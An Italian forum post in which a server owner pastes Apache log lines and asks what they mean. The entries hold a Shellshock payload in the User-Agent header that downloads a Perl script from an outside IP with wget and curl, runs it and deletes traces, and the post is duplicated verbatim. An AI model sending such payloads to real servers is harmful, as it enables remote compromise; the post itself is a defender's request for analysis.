RaouL_BennetH
06-10-2015, 14:12
Buonasera a tutti.
Ho questi logs su un serverino con apache:
62.210.157.90 - - [06/Oct/2015:11:16:44 +0200] "GET /hello HTTP/1.0" 404 486 "-" "() { :;}; /bin/bash -c \"cd /tmp ; rm -rf j* ; wget http://23.229.121.186/paf ; lwp-download http://23.229.121.186/paf ; curl -O /tmp/paf http://23.229.121.186/paf ; perl paf ; perl /tmp/paf ; rm -rf *ju;rm -rf jur*\""
62.210.157.90 - - [06/Oct/2015:11:19:28 +0200] "GET /hello HTTP/1.0" 404 486 "-" "() { :;}; /bin/bash -c \"cd /tmp ; rm -rf j* ; wget http://23.229.121.186/paf ; lwp-download http://23.229.121.186/paf ; curl -O /tmp/paf http://23.229.121.186/paf ; perl paf ; perl /tmp/paf ; rm -rf *ju;rm -rf jur*\""
se si va sul link indicato: http://23.229.121.186/paf, c'è un bello scriptino.
Sapreste analizzarlo e cercare di spiegarmi cosa significa ?
Grazie a tutti.
Ho questi logs su un serverino con apache:
62.210.157.90 - - [06/Oct/2015:11:16:44 +0200] "GET /hello HTTP/1.0" 404 486 "-" "() { :;}; /bin/bash -c \"cd /tmp ; rm -rf j* ; wget http://23.229.121.186/paf ; lwp-download http://23.229.121.186/paf ; curl -O /tmp/paf http://23.229.121.186/paf ; perl paf ; perl /tmp/paf ; rm -rf *ju;rm -rf jur*\""
62.210.157.90 - - [06/Oct/2015:11:19:28 +0200] "GET /hello HTTP/1.0" 404 486 "-" "() { :;}; /bin/bash -c \"cd /tmp ; rm -rf j* ; wget http://23.229.121.186/paf ; lwp-download http://23.229.121.186/paf ; curl -O /tmp/paf http://23.229.121.186/paf ; perl paf ; perl /tmp/paf ; rm -rf *ju;rm -rf jur*\""
se si va sul link indicato: http://23.229.121.186/paf, c'è un bello scriptino.
Sapreste analizzarlo e cercare di spiegarmi cosa significa ?
Grazie a tutti.